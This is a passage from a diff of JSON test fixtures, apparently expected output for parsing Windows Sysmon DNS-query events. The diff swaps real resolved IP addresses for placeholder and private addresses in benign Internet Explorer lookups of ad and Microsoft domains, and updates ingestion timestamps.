SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -752,27 +750,27 @@ }, "answers": [ { - "data": "151.101.1.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.65.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.129.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.193.194", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.1.194", - "151.101.65.194", - "151.101.129.194", - "151.101.193.194" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -787,16 +785,13 @@ "confiant-integrations.global.ssl.fastly.net" ], "ip": [ - "151.101.1.194", - "151.101.65.194", - "151.101.129.194", - "151.101.193.194" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741051400Z", + "ingested": "2021-12-09T13:50:23.456622700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -860,12 +855,12 @@ "type": "CNAME" }, { - "data": "20.36.253.92", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.253.92" + "89.160.20.156" ] }, "network": { @@ -881,13 +876,13 @@ "c.msn.com" ], "ip": [ - "20.36.253.92" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741057400Z", + "ingested": "2021-12-09T13:50:23.456628300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -955,17 +950,17 @@ "type": "CNAME" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "13.107.21.200", - "204.79.197.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -982,14 +977,13 @@ "c.bing.com" ], "ip": [ - "13.107.21.200", - "204.79.197.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741063100Z", + "ingested": "2021-12-09T13:50:23.456633800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -1049,12 +1043,12 @@ }, "answers": [ { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { @@ -1069,13 +1063,13 @@ "contextual.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741070500Z", + "ingested": "2021-12-09T13:50:23.456639800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1151,12 +1145,12 @@ "type": "CNAME" }, { - "data": "152.195.32.120", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "152.195.32.120" + "89.160.20.156" ] }, "network": { @@ -1175,13 +1169,13 @@ "at.atwola.com" ], "ip": [ - "152.195.32.120" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741079Z", + "ingested": "2021-12-09T13:50:23.456645400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1249,15 +1243,15 @@ "type": "CNAME" }, { - "data": "204.13.192.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.120", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -1265,7 +1259,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -1273,7 +1267,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -1281,20 +1275,20 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "204.13.192.56", - "204.13.192.120", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -1311,21 +1305,20 @@ "m.adnxs.com" ], "ip": [ - "204.13.192.56", - "204.13.192.120", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741087100Z", + "ingested": "2021-12-09T13:50:23.456651Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1389,12 +1382,12 @@ "type": "CNAME" }, { - "data": "74.6.137.78", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "74.6.137.78" + "89.160.20.156" ] }, "network": { @@ -1410,13 +1403,13 @@ "cms.analytics.yahoo.com" ], "ip": [ - "74.6.137.78" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741098800Z", + "ingested": "2021-12-09T13:50:23.456656600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 